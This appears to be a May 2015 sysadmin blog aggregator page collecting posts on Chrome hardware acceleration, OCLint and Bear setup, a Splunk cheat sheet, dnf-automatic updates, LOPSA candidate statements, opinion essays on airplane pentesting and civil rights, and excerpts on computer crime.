Beware that when speeding up video you will need to make sure your video card can handle the higher frame rates. When I stream a video file from local storage with a local program like VLC at 2x, it is very smooth, without much jitter or video tearing. When streaming content from Netflix, YouTube, or other sites using this browser plugin, you are using the browser as the video player, and it might not be as clean an experience. You might notice more jitter in the video and some frame tearing on fast-moving scenes. This usually happens if your hardware can't keep up rendering the video or if hardware acceleration is not enabled.

Chrome hardware acceleration

My testing for this is being done on Linux with Google Chrome using the accelerated Nvidia drivers with a GeForce GT 520, a video card from 2011. What I had to do to get rid of the jitter and tearing is turn hardware acceleration on in Chrome. Google seems to be very careful about whether or not they turn on hardware acceleration; they usually don't turn it on unless they know for sure it will work. Mine was not turned on even though I had a video card that supported acceleration and the correct drivers. Chrome's detection of this might not be the best, or Google did not think the drivers were stable enough. What is great is you can turn it on anyway and it works great.

Turn on hardware acceleration in Chrome

To see if hardware acceleration is already turned on, type "chrome://gpu" in your Chrome URL bar. If it's turned off you will likely see lots of red text indicating so. Look for "Video decode" and see if it says "Disabled". If so you will need to turn it on. If it says "Hardware accelerated" then you're good and can skip the rest of this paragraph. To turn on hardware acceleration, type "chrome://flags" in the Chrome URL bar. The first setting says "Override software rendering list". Click "Enable" to turn on the override, then restart Chrome. Go back to "chrome://gpu" and see if it says "Video decode: Hardware accelerated". If so, go try to watch a movie or a YouTube video again; it should be much smoother and likely have less tearing. If you still see tearing, go into your video driver config and make sure you have Sync to VBlank enabled. Mine is in the Nvidia X Server Settings manager under "OpenGL Settings" -> Performance; check the box "Sync to VBlank".

Other neat Netflix streaming things

Netflix provides some hidden menus for stats and changing the bit rates of your streams. Here are some different ones to try. I tried these using Chrome on Linux and they all worked for me.

  • Stream Manager - Control+Alt+Shift+S
    • Here you will be able to choose the maximum bit rate at which you will stream. Highlighting multiple selections gives Netflix a minimum/maximum range of bit rates to stream at.
    • This menu also gives you the option to select which CDN you will receive your stream from. Tweak it a bit; you might get better performance with some of them than others.
  • AV Stats - Control+Alt+Shift+D
    • On this screen you will see a lot of "stats for nerds" sorts of things; you might want to have this open when you're tweaking the CDN to see which servers are actually giving you better speeds.
  • Log Screen - Control+Alt+Shift+L

by at May 16, 2015 07:41 PM

Michael Biven

More Messy Experiments; everything doesn’t need to be a side project

Artists have sketchbooks to doodle in and writers have journals as a way to try out new ideas and grow. Each is willing to have something they produced go no further than that moment. Both use repeatable processes to examine their talents and push their boundaries out a little.

Each bit of code you write or system you put together that isn’t involved with your day job doesn’t have to become a side project. Learning new concepts and testing out hypotheses is the goal. And you need a place where the only boundaries you have are time and your imagination.

‘Whenever you feel an impulse to perpetrate a piece of exceptionally fine writing, obey it—whole-heartedly—and delete it before sending your manuscript to press. Murder your darlings.’

– Arthur Quiller-Couch On Style from On the Art of Writing (1916)

“If I forget the words, they weren’t very memorable in the first place.”

– Willie Nelson, on writing down lyrics

I use these two quotes because at first you should be willing to do things that are silly, unsafe, or uncool. Make the time to take a crazy thought to its practical end and then examine it. Then if you create something that sticks with you, something that is memorable, well then you are onto something worth exploring a little more.

Give yourself the freedom to experiment with your ideas and the tools available. If you don’t, you are limiting yourself to the current version of you. You cannot grow if you don’t work to remove any limits you place on yourself.

And if an experiment turns into a side project or service, well then great. Just don’t start off everything with the notion that to be a successful exercise it has to become one.

May 16, 2015 04:06 PM

Errata Security

Those expressing moral outrage probably can't do math

Many are discussing the FBI document where Chris Roberts ("the airplane hacker") claimed to an FBI agent that at one point, he hacked the plane's controls and caused the plane to climb sideways. The discussion hasn't elevated itself above the level of anti-vaxxers.

It's almost certain that the FBI's account of events is not accurate. The technical details are garbled in the affidavit. The FBI is notorious for hearing what they want to hear from a subject, which is why for years their policy has been to forbid recording devices during interrogations. If they need Roberts to have said "I hacked a plane" in order to get a search warrant, then that's what their notes will say. It's like cops who will yank the collar of a drug sniffing dog in order to "trigger" on drugs so that they have an excuse to search the car.

Also, security researchers are notorious for being misunderstood. Whenever we make innocent statements about what we "could" do, others often interpret this either as a threat or a statement of what we already have done.

Assuming this scenario is true, that Roberts did indeed control the plane briefly, many claim that this is especially reprehensible because it endangered lives. That's the wrong way of thinking about it. Yes, it would be wrong because it means accessing computers without permission, but the "endangered lives" component doesn't necessarily make things worse.

Many operate under the principle that you can't put a price on a human life. That is false, provably so. If you take your children with you to the store, instead of paying the neighbor $10 to babysit them, then you've implicitly put a price on your children's lives. Traffic accidents near the home are the leading cause of death for children. Driving to the store is vastly more dangerous than leaving the kids at home, so you've priced that danger around $10.

Likewise, society has limited resources. Every dollar spent on airline safety has to come from somewhere, such as from AIDS research. With current spending, society is effectively saying that airline passenger lives are worth more than AIDS victims.

Does pentesting an airplane put passenger lives in danger? Maybe. But then so does leaving airplane vulnerabilities untested, which is the current approach. I don't know which one is worse -- but I do know that your argument is wrong when you claim that endangering planes is unthinkable. It is thinkable, and we should be thinking about it. We should be doing the math to measure the risk, pricing each of the alternatives.
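To make "doing the math" concrete, here is a toy expected-value comparison; every number in it is a made-up assumption for illustration, not a real risk estimate:

```shell
# Toy expected-value math: one live pentest with an assumed 1-in-10-million
# crash risk, versus an assumed 1-in-a-billion latent-flaw risk per flight
# across ten million flights; 150 assumed passengers per plane.
awk 'BEGIN {
  deaths_if_tested   = 1e-7 * 1 * 150
  deaths_if_untested = 1e-9 * 10000000 * 150
  print (deaths_if_tested < deaths_if_untested ? "testing is safer" : "secrecy is safer")
}'
```

With these invented inputs the "unthinkable" option comes out ahead; the point is only that the answer depends on measured risks, not on outrage.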

It's like whistleblowers. The intelligence community hides illegal mass surveillance programs from the American public because it would be unthinkable to endanger people's lives. The reality is that the danger from the programs is worse, and when revealed by whistleblowers, nothing bad happens.

The same is true here. Airlines assure us that planes are safe and cannot be hacked -- while simultaneously saying it's too dangerous for us to try hacking them. Both claims cannot be true, so we know something fishy is going on. The only way to pierce this bubble and find out the truth is to do something the airlines don't want, such as whistleblowing or live pentesting.

The systems are built to be reset and manually overridden in-flight. Hacking past the entertainment system to prove one could control the airplane introduces only a tiny danger to the lives of those on-board. Conversely, the current "security through obscurity" stance of the airlines and FAA is an enormous danger. Deliberately crashing a plane just to prove it's possible would of course be unthinkable. But running a tiny risk of crashing the plane, in order to prove it's possible, probably will harm nobody. If never having a plane crash due to hacking is your goal, then a live test on a plane during flight is a better way of doing this than the current official policies of keeping everything secret. The supposed "unthinkable" option of a live pentest is still (probably) less dangerous than the "thinkable" options.

I'm not advocating anyone do it, of course. There are still better options, such as hacking the system once the plane is on the ground. My point is only that it's not an unthinkable danger. Those claiming it is haven't measured the dangers and alternatives.

The same is true of all security research. Those outside the industry believe in security-through-obscurity, that if only they can keep details hidden and pentesters away from computers, then they will be safe. We inside the community believe the opposite, in Kerckhoffs's Principle of openness, and that the only trustworthy systems are those which have been thoroughly attacked by pentesters. There is a short-term cost of releasing vulns in Adobe Flash, because hackers will use them. But the long-term benefit is that this leads to a more secure Flash, and better alternatives like HTML5. If you can't hack planes in-flight, then what you are effectively saying is that our belief in Kerckhoffs's Principle is wrong.

Each year, people die (or get permanently damaged) from vaccines. But we do vaccines anyway because we are rational creatures who can do math, and can see that the benefits of vaccines are a million to one times greater than the dangers. We look down on the anti-vaxxers who rely upon "herd immunity" and the fact that the rest of us put our children through danger in order to protect their own. We should apply that same rationality to airline safety. If you think pentesting live airplanes is unthinkable, then you should similarly be able to do the math and prove it, rather than rely upon irrational moral outrage.

I'm not arguing hacking airplanes mid-flight is a good idea. I'm simply pointing out it's a matter of math, not outrage.

by Robert Graham at May 16, 2015 03:45 AM

May 15, 2015

League of Professional System Administrators

Atom Powers announces his candidacy for Board Member.

I am Atom Powers, apowers on IRC, and I am running for the Board (and from the velociraptors).

You can see my full statement here: (Evernote Document)

by aelios at May 15, 2015 06:31 PM

Errata Security

Revolutionaries vs. Lawyers

I am not a lawyer; I am a revolutionary. I mention this in response to Volokh posts [1, 2] on whether the First Amendment protects filming police. It doesn't -- it's an obvious stretch, and relies upon concepts like a protected "journalist" class who enjoys rights denied to the common person. Instead, the Ninth Amendment, combined with the Declaration of Independence, is what makes filming police a right.

The Ninth Amendment simply says the people have more rights than those enumerated by the Bill of Rights. There are two ways of reading this. Some lawyers take the narrow view, that this doesn't confer any additional rights, but is just a hint on how to read the Constitution. Some take a more expansive view, that there are a vast number of human rights out there, waiting to be discovered. For example, some wanted to use the Ninth Amendment to insist "abortion" was a human right in Roe v. Wade. Generally, lawyers take the narrow view, because the expansive view becomes ultimately unworkable when everything is a potential "right".

I'm not a lawyer, but a revolutionary. For me, rights come not from the Constitution, Bill of Rights, or Supreme Court decisions. They come from the Declaration of Independence: the "natural rights" assertion, but also things like the following phrase used to justify the colonies' revolution:
...when a long train of abuses and usurpations, pursuing invariably the same Object evinces a design to reduce them [the people] under absolute Despotism, it is their right, it is their duty, to throw off such Government...
The state inevitably strives to protect its privilege and power at the expense of the people. The Bill of Rights exists to check this -- so that we don't need to resort to revolution every few decades. The First Amendment protects free speech not because this is a good thing, but because it's the sort of the thing the state wants to suppress to protect itself.

In this context, therefore, abortion isn't a "right". Abortion neither helps nor harms the despot's power. Whether or not it's a good thing, whether it should be legal, or even whether the constitution should mention abortion, isn't the issue. The only issue here is how it relates to government power.

Thus, we know that "recording police" is a right under the Declaration of Independence. The police want to suppress it, because it challenges their despotism. We've seen this in the last year, as films of police malfeasance have led to numerous protests around the country. If filming the police were illegal in the United States, this would be a usurpation that would justify revolt.

Everyone knows this, so they struggle to fit it within the constitution. In the article above, a judge uses fancy rhetoric to try to shoehorn it into the First Amendment. I suggest they stop resisting the Ninth and use that instead. They don't have to accept an infinite number of "rights" in order to use those clearly described in the Declaration of Independence. The courts should simply say filming police helps us resist despots, and is therefore protected by the Ninth Amendment channeling the Declaration of Independence.

The same sort of argument happens with the Fourth Amendment right to privacy. The current legal climate talks about a reasonable expectation of privacy. This is wrong. The correct reasoning should start with a reasonable expectation of abuse by a despot.

Under current reasoning about privacy, government can collect all phone records, credit card bills, and airline receipts -- without a warrant. That's because since this information is shared with a third party, the company you are doing business with, you don't have a "reasonable expectation of privacy".

Under my argument about the Ninth, this should change. We all know that a despot is likely to abuse these records to maintain their power. Therefore, in order to protect against a despot, the people have the right that this information should be accessible only with a warrant, and that all accesses by the government should be transparent to the public (none of this secret "parallel construction" nonsense).

We all know there is a problem here needing resolution. Cyberspace has put our "personal effects" in the cloud, where third parties have access to them, yet we still want them to be "private". We struggle with how that third party (like Facebook) might invade that privacy. We struggle with how the government might invade that privacy. It's a substantial enough change that I don't think precedent guides us, not Katz, not Smith v. Maryland. I think the only guidance comes from the founding documents. The current state of affairs means that cyberspace has made personal effects obsolete -- I don't think this is correct.

Lastly, this brings me to crypto backdoors. The government is angry because even if Apple were to help them, they still cannot decrypt your iPhone. The government wants Apple to put in a backdoor, giving the police a "Golden Key" that will decrypt any phone. The government reasonably argues that backdoors would only be used with a search warrant, and thus, government has the authority to enforce backdoors. The average citizen deserves the protection of the law against criminals who would use crypto to hide their evil deeds from the police. When an evil person has kidnapped, raped, and murdered your daughter, all data from their encrypted phone should be available to the police in order to convict them.

But here's the thing. In the modern, interconnected world, we can only organize a revolution against our despotic government if we can send backdoor-free messages among ourselves. This is unlikely to be much of a concern in the United States, of course, but it's a concern throughout the rest of the world, like Russia and China. The Arab Spring was a powerful demonstration of how modern technology mobilized the populace to force regime change. Despots with crypto backdoors would be able to prevent such things.

I use Russia/China here, but I shouldn't have to. Many argue that since America is free, and the government under the control of the people, that we operate under different rules than those other despotic countries. The Snowden revelations prove this wrong. Snowden revealed a secret, illegal, mass surveillance program that had been operating for six years under the auspices of all three branches (executive, legislative, judicial) and both Parties (Republican and Democrat). Thus, it is false that our government can be trusted with despotic powers. Instead, our government can only be trusted because we deny it despotic powers.

QED: the people have the right to backdoor-free crypto.

I write this because I often hang out with lawyers. They have a masterful command of all the legal decisions and precedent, such as the Katz decision on privacy. It's not that I disrespect their vast knowledge on the subject, or deny their reasoning is solid. It's that I just don't care. I'm a revolutionary. Cyberspace, 9/11, and the war on drugs has led to an alarming number of intolerable despotic usurpations. If you lawyer people believe nothing in the Constitution or Bill of Rights can prevent this, then it's our right, even our duty, to throw off the current system and institute one that can.

by Robert Graham at May 15, 2015 07:03 AM

May 14, 2015

League of Professional System Administrators

Candidate Statement for LOPSA Board 2015

Two years ago, I felt that LOPSA was poised for growth.  I was a bit early in that assessment, as LOPSA was still burdened by debt that limited its ability to focus on the future.  That debt is now paid off and LOPSA can focus on the future - our future as system admins.  If re-elected, my goal is to help LOPSA re-align itself with where system administration is now and will be in the future; to support system admin education and new system admins just starting out; and to help LOPSA find a voice for itself.

read more

by ski at May 14, 2015 05:05 AM

Candidate Statement for LOPSA Board 2015

There's been a change at LOPSA recently.  Less talking, more doing.  My name is William Bilancio and I am proud to be part of that change. 
Recent accomplishments:

  • 5 successful conferences: I chaired the inaugural PICC 2010; mentored Cascadia IT 2011, 2012, and 2013; and coordinated the hotel, food, and audio-visual contracts and lined up all the trainers for PICC 2011 and 2012, LOPSA-East ‘13, and LOPSA-East ‘14.  All were profitable before the doors opened.  A combined total of more than 150 new LOPSA memberships were gained, putting over $9,000 in LOPSA's bank account.
  • Working on getting the LOPSA web site looking more modern, upgrading it to Drupal 7, and getting forums up and running
  • Hosted the LOPSA board retreat at my office in NJ to save money for the past 4 years.
  • Member and chair of the LOPSA Education Committee since 2005, coordinating our efforts at SCALE, OLF and more.


read more

by wbilancio at May 14, 2015 12:50 AM

May 13, 2015

Warren Guy

Planet SysAdmin software update

I learned yesterday that some HTTPS blogs/feeds weren't being successfully polled by the (very old) PlanetPlanet software powering Planet SysAdmin. Rather than figuring out why software last maintained in 2006 isn't working properly in 2015, I upgraded to the more recent Planet Venus fork.

Everything should look and work the same as before. However as a consequence of rebuilding the Planet cache and being able to poll certain HTTPS blogs for the first time in a long time, some old posts from as early as 2008 have sneaked back into the feed today. If you notice any other problems with the Planet, please let me know!

Read full post

May 13, 2015 12:58 AM

May 12, 2015

LZone - Sysadmin


After a friend of mine suggested reading "The things you need to know to do web development", I felt the need to compile a solution index for the experiences described. This interesting blog post describes the author's view of the typical learning curve of a web developer and the tools, solutions, and concepts he discovers as he becomes a successful developer.

I do not want to summarize the post but I wanted to compile a list of those solutions and concepts affecting the life of a web developer.

Markup Standards Knowledge: HTML, CSS, JSON, YAML
Web Stack Layering: Basic knowledge about
  • Using TCP as transport protocol
  • Using HTTP as application protocol
  • Using SSL to encrypt the application layer with HTTPS
  • Using SSL certificates to prove the identity of websites
  • Using (X)HTML for the application layer
  • Using DOM to access/manipulate application objects
Web Development Concepts
  • 3 tier server architecture
  • Distinction of static/dynamic content
  • Asynchronous CSS, JS loading
  • Asynchronous networking with Ajax
  • CSS box models
  • CSS Media Queries
  • Content Delivery Networks
  • UX, Usability...
  • Responsive Design
  • Page Speed Optimization
  • HTTP/HTTPS content mixing
  • Cross domain content mixing
  • MIME types
  • API-Pattern: RPC, SOAP, REST
  • Localization and Internationalization
Developer Infrastructure
  • Code Version Repo: usually Git. Hosted or self-hosted e.g. gitlab
  • Continuous Integration: Jenkins, Travis
  • Deployment: Jenkins, Travis, fabric, Bamboo, CruiseControl
Frontend JS Frameworks: Mandatory knowledge of jQuery, as well as one or more JS frameworks such as

Bootstrap, Foundation, React, Angular, Ember, Backbone, Prototype, GWT, YUI
Localization and Internationalization: Frontend: usually a JS lib, e.g. LocalePlanet or Globalize

Backend: often in gettext or a similar mechanism
Precompiling Resources: For Javascript: Minify

For CSS:

For Images: ImageMagick

Test everything with Google PageSpeed Insights
Backend Frameworks: By language
  • PHP: CakePHP, CodeIgniter, Symfony, Seagull, Zend, Yii (choose one)
  • Python: Django, Tornado, Pylons, Zope, Bottle (choose one)
  • Ruby: Rails, Merb, Camping, Ramaze (choose one)
Web Server Solutions: nginx, Apache

For loadbalancing: nginx, haproxy

As PHP webserver: nginx+PHPFPM
RDBMS: MySQL (maybe Percona, MariaDB), Postgres
Caching/NoSQL: Without replication: memcached, memcachedb, Redis

With replication: Redis, Couchbase, MongoDB, Cassandra

Good comparisons: #1 #2
Hosting: If you are unsure about self-hosting vs. cloud hosting, have a look at the Cloud Calculator.
Blogs: Do not try to self-host blogs. You will fail at keeping them secure and up-to-date, and sooner or later they will be hacked. Use a blog hosting provider right from the start.

May 12, 2015 04:00 PM

Static Code Analysis of any Autotools Project with OCLint

The following is a HowTo describing the setup of OCLint for any C/C++ project using autotools.

1. OCLint Setup

The first step is downloading OCLint. As there are no packages so far, it's just a matter of extracting the tarball somewhere in $HOME. Check out the latest release link on the OCLint site:
wget ""
tar zxvf oclint-0.8.1-x86_64-linux-3.13.0-35-generic.tar.gz 
This should leave you with a copy of OCLint in ~/oclint-0.8.1

2. Bear Setup

As projects usually consist of a lot of source files in different subdirectories, it is hard for a linter to know where to look for them. While "cmake" has support for dumping a list of the source files it processes during a run, "make" doesn't. This is where the "Bear" wrapper comes into play: instead of
make
you run
bear make
so "bear" can track all files being compiled. It will dump a JSON file "compile_commands.json" which OCLint can use to do analysis of all files.
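The dumped "compile_commands.json" is a JSON array of objects with "directory", "command", and "file" keys (the Clang JSON compilation database format). A quick way to peek at which files Bear recorded, using a hypothetical sample in place of a real build:

```shell
# Hypothetical compile_commands.json, shaped like what Bear produces.
cat > /tmp/compile_commands.json <<'EOF'
[
  {"directory": "/tmp/liferea", "command": "cc -c conf.c", "file": "conf.c"},
  {"directory": "/tmp/liferea/src", "command": "cc -c feed.c", "file": "feed.c"}
]
EOF

# List the tracked source files (a JSON-aware tool like jq is nicer, if installed).
grep -o '"file": *"[^"]*"' /tmp/compile_commands.json
```

If a source file is missing from this list, it was never compiled during the "bear make" run and OCLint will not analyze it.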

To set up Bear do the following:
git clone
cd Bear
cmake .
make
sudo make install

3. Analyzing Code

Now we have all the tools we need. Let's take an autotools project like Liferea. Before doing code analysis it should be downloaded and built at least once:
git clone
cd liferea
./autogen.sh
make
Now we collect all code file compilation instructions with bear:
make clean
bear make
And if this succeeds we can start a complete analysis with
which will run OCLint with the input from "compile_commands.json" produced by "bear". Don't call "oclint" directly, as you'd need to pass all compile flags manually.
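With the 0.8.x tarball layout from step 1, the driver that reads "compile_commands.json" is typically invoked like this (the helper name and path are assumptions based on that release, not taken from this article):

```shell
# oclint-json-compilation-database wraps oclint, feeding it every file
# and compiler flag recorded in compile_commands.json; run it from the
# directory containing that file.
~/oclint-0.8.1/bin/oclint-json-compilation-database
```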

If all went well you should see code analysis lines like these:
conf.c:263:9: useless parentheses P3 
conf.c:274:9: useless parentheses P3 
conf.c:284:9: useless parentheses P3 
conf.c:46:1: high cyclomatic complexity P2 Cyclomatic Complexity Number 33 exceeds limit of 10
conf.c:157:1: high cyclomatic complexity P2 Cyclomatic Complexity Number 12 exceeds limit of 10
conf.c:229:1: high cyclomatic complexity P2 Cyclomatic Complexity Number 30 exceeds limit of 10
conf.c:78:1: long method P3 Method with 55 lines exceeds limit of 50
conf.c:50:2: short variable name P3 Variable name with 2 characters is shorter than the threshold of 3
conf.c:52:2: short variable name P3 Variable name with 1 characters is shorter than the threshold of 3

May 12, 2015 04:00 PM

Splunk Cheat Sheet

Basic Searching Concepts

Simple searches look like the following examples. Note that there are literals with and without quoting and that there are field selections with an "=":
Exception                # just the word
One Two Three            # those three words in any order
"One Two Three"          # the exact phrase

# Filter all lines where field "status" has value 500 from access.log
source="/var/log/apache/access.log" status=500

# Give me all fatal errors from syslog of the blog host
host="myblog" source="/var/log/syslog" Fatal

Basic Filtering

Two important filters are "rex" and "regex".

"rex" is for extracting a pattern and storing it as a new field. This is why you need to specify a named extraction group in Perl-like manner, "(?P<name>...)", for example
source="some.log" Fatal | rex "(?i) msg=(?P<FIELDNAME>[^,]+)"
When running the above query, check the list of "interesting fields": it now should have an entry "FIELDNAME" listing the top 10 fatal messages from "some.log".

What is the difference from "regex" then? Well, "regex" is like grep. Actually you can rephrase
source="some.log" Fatal
as
source="some.log" | regex _raw=".*Fatal.*"
and get the same result. The syntax of "regex" is simply "<field>=<regex>". Using it makes sense once you want to filter on a specific field.


Sum up a field and do some arithmetic:
... | stats sum(<field>) as result | eval result=(result/1000)
Determine the size of log events by checking len() of _raw. The p10() and p90() functions return the 10th and 90th percentiles:
| eval raw_len=len(_raw) | stats avg(raw_len), p10(raw_len), p90(raw_len) by sourcetype

Simple Useful Examples

Splunk usually auto-detects access.log fields so you can do queries like:
source="/var/log/nginx/access.log" HTTP 500
source="/var/log/nginx/access.log" HTTP (200 OR 30*)
source="/var/log/nginx/access.log" status=404 | sort - uri 
source="/var/log/nginx/access.log" | head 1000 | top 50 clientip
source="/var/log/nginx/access.log" | head 1000 | top 50 referer
source="/var/log/nginx/access.log" | head 1000 | top 50 uri
source="/var/log/nginx/access.log" | head 1000 | top 50 method

Emailing Results

By appending "sendemail" to any query you get the result by mail!
... | sendemail to=""


Create a timechart from a single field that should be summed up:
... | table _time, <field> | timechart span=1d sum(<field>)
... | table _time, <field>, name | timechart span=1d sum(<field>) by name

Index Statistics

List All Indices
 | eventcount summarize=false index=* | dedup index | fields index
 | eventcount summarize=false report_size=true index=* | eval size_MB = round(size_bytes/1024/1024,2)
 | REST /services/data/indexes | table title
 | REST /services/data/indexes | table title splunk_server currentDBSizeMB frozenTimePeriodInSecs maxTime minTime totalEventCount
On the command line you can call
$SPLUNK_HOME/bin/splunk list index
To query the amount written per index, the metrics.log can be used:
index=_internal source=*metrics.log group=per_index_thruput series=* | eval MB = round(kb/1024,2) | timechart sum(MB) as MB by series
MB per day per indexer / index:
index=_internal metrics kb series!=_* "group=per_host_thruput" monthsago=1 | eval indexed_mb = kb / 1024 | timechart fixedrange=t span=1d sum(indexed_mb) by series | rename sum(indexed_mb) as totalmb

index=_internal metrics kb series!=_* "group=per_index_thruput" monthsago=1 | eval indexed_mb = kb / 1024 | timechart fixedrange=t span=1d sum(indexed_mb) by series | rename sum(indexed_mb) as totalmb

May 12, 2015 04:00 PM

The FreeBSD Diary

ZFS benchmark

I have more RAM, how will this affect things?

May 12, 2015 03:58 PM

DLT drive replacement

Out with the old, in with the new!

May 12, 2015 03:58 PM

DLT labels

Tapes without labels in a library should not happen

May 12, 2015 03:58 PM

Life of a Sysadmin

System installation, or licenses for redistribution

Part of my job is to prep Windows laptops for coworkers; it is my goal to provide laptops fully set up. This means, among other things, I need to have Adobe Reader and Adobe Flash Player installed when they receive the machine. Unfortunately Adobe wishes to make that a little difficult.

The license for Adobe Reader, however, does not permit me, as IT support for an employee, to distribute Adobe Reader on a machine I am providing to the employee. Adobe would want me to simply point the employee at the download site for Adobe Reader.

For me to distribute these products, I am supposed to agree to a different license agreement, one intended for distribution. This likely isn't a problem for most IT employees, as most never actually read license agreements. My company however has a clear policy that employees are not allowed to agree to contracts without the approval of the lawyers.

Considering that Adobe is interested in having Adobe Reader and Flash Player installed on as many machines as possible, why must they throw additional obstacles in my way?

May 12, 2015 03:58 PM

Let's touch base, or Harassment

In the past week, I have spoken with over a dozen salespeople (I sought pricing on business cellphone plans and a new photocopier). I have heard the phrase "I just wanted to touch base" many times. I have grown to have a great dislike of that phrase.

I do believe that every time I have heard "I just wanted to touch base" in the last seven days, it was prefaced by an interrupting phone call and followed by an annoying couple of minutes of a sales weasel not accepting my quite clear and simple statement of "Thank you for the quote, I am evaluating all of the options and will get back to you with questions, concerns, or with our decision." I wouldn't hold the phone call against them if I had not made it abundantly clear to each of these people that email is my preferred method of contact. Worse is that in most cases, it has taken more than a few such phone calls from each of them to get them to leave me alone.

So, ignoring the sexual harassment angle of the phrase, I am clearly starting to associate it with annoyance.

May 12, 2015 03:58 PM

Sysadmins Law 9, or Backups must be automated

We have a reasonable system to perform backups of laptops that are regularly on our local network. For laptops that live most of their life connected to the office over the internet and through a VPN connection it is much harder. Instead of an automated backup, the user must initiate the backup themselves. Automated messages are sent out when it has been a week without backups. And I talk to them on the phone a few days after that if a backup hasn't been done.

One such user came into my office complaining that his laptop blue-screened on boot, and that it had been crashing regularly for the few days before. Booting off other media quickly showed the disk was failing in a pretty spectacular way. When I informed the user of this, he said, "I guess I should have backed up like you told me to, eh?" Yeah, I guess so.

Which brings me to sysadmin law 9

Backups that are not automated are not done.

May 12, 2015 03:58 PM

Racker Hacker

Automatic package updates with dnf

With Fedora 22’s release date quickly approaching, it’s time to familiarize yourself with dnf. It’s especially important since clean installs of Fedora 22 won’t have yum.

Almost all of the command line arguments are the same but automated updates are a little different. If you’re used to yum-updatesd, then you’ll want to look into dnf-automatic.


Getting the python code and systemd unit files for automated dnf updates is a quick process:

dnf -y install dnf-automatic


There’s only one configuration file to review and most of the defaults are quite sensible. Open up /etc/dnf/automatic.conf with your favorite text editor and review the available options. The only adjustment I made was to change the emit_via option from the default stdio to email.

You may want to change the email_to option if you want to redirect email elsewhere. In my case, I already have an email forward for the root user.
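For reference, the two options mentioned above live in /etc/dnf/automatic.conf roughly like this (the section names here are from the shipped dnf-automatic config and are worth verifying against your installed file):

```ini
[emitters]
# send results by mail instead of printing to stdout
emit_via = email

[email]
email_to = root
```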

dnf Automation

If you look at the contents of the dnf-automatic package, you’ll find some python code, configuration files, and two important systemd files:

# rpm -ql dnf-automatic | grep systemd

These systemd files are what make dnf-automatic run. The service file contains the instructions so that systemd knows what to run. The timer file contains the frequency of the update checks (defaults to one day). We need to enable the timer and then start it:

systemctl enable dnf-automatic.timer
systemctl start dnf-automatic.timer

Check your work:

# systemctl list-timers *dnf*
NEXT                         LEFT     LAST                         PASSED    UNIT                ACTIVATES
Tue 2015-05-12 19:57:30 CDT  23h left Mon 2015-05-11 19:57:29 CDT  14min ago dnf-automatic.timer dnf-automatic.service

The output here shows that the dnf-automatic job last ran at 19:57 on May 11th and it’s set to run at the same time tomorrow, May 12th. Be sure to disable and stop your yum-updatesd service if you still have it running on your system from a previous version of Fedora.

Photo Credit: Outer Rim Emperor via Compfight cc


by Major Hayden at May 12, 2015 01:22 AM

May 10, 2015


What Year Is This?

I recently read a manuscript discussing computer crime and security. I've typed out several excerpts and published them below. Please read them and try to determine how recently this document was written.

The first excerpt discusses the relationship between the computer and the criminal.

"The impersonality of the computer and the fact that it symbolizes for so many a system of uncaring power tend not only to incite efforts to strike back at the machine but also to provide certain people with a set of convenient rationalizations for engaging in fraud or embezzlement. The computer lends an ideological cloak for the carrying out of criminal acts.

Computer crime... also holds several other attractions for the potential lawbreaker. It provides intellectual challenge -- a form of breaking and entering in which the burglar’s tools are essentially an understanding of the logical structure of and logical flaws inherent in particular programming and processing systems. It opens the prospect of obtaining money by means that, while clearly illegal, do not usually involve taking it directly from the till or the cashier’s drawer...

Other tempting features of computer crime, as distinct from other forms of criminal activity, are that most such crimes are difficult to detect and that when the guilty parties are detected not much seems to happen to them. For various reasons, they are seldom intensively prosecuted, if they are prosecuted at all. On top of these advantages, the haul from computer crime tends to be very handsome compared with that from other crimes."

The second excerpt describes the attitudes of corporate computer crime victims.

"The difficulties of catching up with the people who have committed computer crimes is compounded by the reluctance of corporations to talk about the fact that they have been defrauded and by the difficulties and embarrassments of prosecution and trial. In instance after instance, corporations whose assets have been plundered -- whose computer operations have been manipulated to churn out fictitious accounting data or to print large checks to the holders of dummy accounts -- have preferred to suffer in silence rather than to have the horrid facts about the frailty of their miracle processing systems come to public attention.

Top management people in large corporations fear that publicity about internal fraud could well affect their companies’ trading positions on the stock market, hold the corporations up to public ridicule, and cause all sorts of turmoil within their staffs. In many cases, it seems, management will go to great lengths to keep the fact of an internal computer crime from its own stockholders...

The reluctance of corporations to subject themselves to unfavorable publicity over computer crimes is so great that some corporations actually seem willing to take the risk of getting into trouble with the law themselves by concealing crimes committed against them. Among independent computer security consultants, it is widely suspected that certain banks, which seem exceptionally reluctant to admit that such a thing as computer fraud even exists in the banking fraternity, do not always report such crimes to the Comptroller of the Currency, in Washington, when they occur, as all banks are required to do by federal law. Bank officers do not discuss the details of computer crime with the press... [A] principal reason for this kind of behavior is the fear on the part of the banks that such a record will bring about an increase in their insurance rates."

The third excerpt talks about the challenges of prosecuting computer crime.

"In addition to the problems of detecting and bringing computer crimes to light, there are the difficulties of effectively prosecuting computer criminals. In the first place, the police, if they are to collect evidence, have to be able to understand precisely how a crime may have been committed, and that usually calls for the kind of technical knowledge that is simply not available to most police departments...

Another difficulty is that not only police and prosecutors but judges and juries must be able to find their way through the mass of technical detail before they can render verdicts and hand down decisions in cases of computer crime, and this alone is a demanding task. In the face of all the complexities involved and all the time necessary to prepare a case that will stand up in court, many prosecutors try to make the best accommodation they can with the defendant’s lawyers by plea bargaining, or else they simply allow the case to fade away unprosecuted. If they do bring a case to trial, they have the problem of presenting evidence that is acceptable to the court."

The fourth excerpt mentions "sophistication" -- a hot topic!

"To somebody looking at the problem of computer crime as a whole, one conclusion that seems reasonable is that although some of the criminal manipulators of computer systems have shown certain ingenuity, they have not employed highly sophisticated approaches to break into and misuse computer systems without detection. In a way, this fact in itself is something of a comment on the security of most existing computer systems: the brains are presumably available to commit those sophisticated computer crimes, but the reason that advanced techniques haven’t been used much may well be that they haven’t been necessary."

The fifth excerpt briefly lists possible countermeasures.

"The accelerating incidence of computer-related crimes -- particularly in the light of the continuing rapid growth of the computer industry and the present ubiquity of electronic data-processing systems -- raises the question of what countermeasures can be taken within industry and government to prevent such crimes, or, at least, to detect them with precision when they occur...

In addition to tight physical security for facilities, these [countermeasures] included such internal checks within a system to insure data security as adequate identification procedures for people communicating with the computer... elaborate internal audit trails built into a system, in which every significant communication between a user and a computer would be recorded; and, where confidentiality was particularly important, cryptography..."

Now, based on what you have read, I'd like you to guess the decade in which these excerpts were written. By answering the survey you will learn the publication date.


I'll leave you with one other quote from the manuscript:

The fact is, [a security expert] said, that “the data-security job will never be done -- after all, there will never be a bank that absolutely can’t be robbed.” The main thing, he said, is to make the cost of breaching security so high that the effort involved will be discouragingly great.

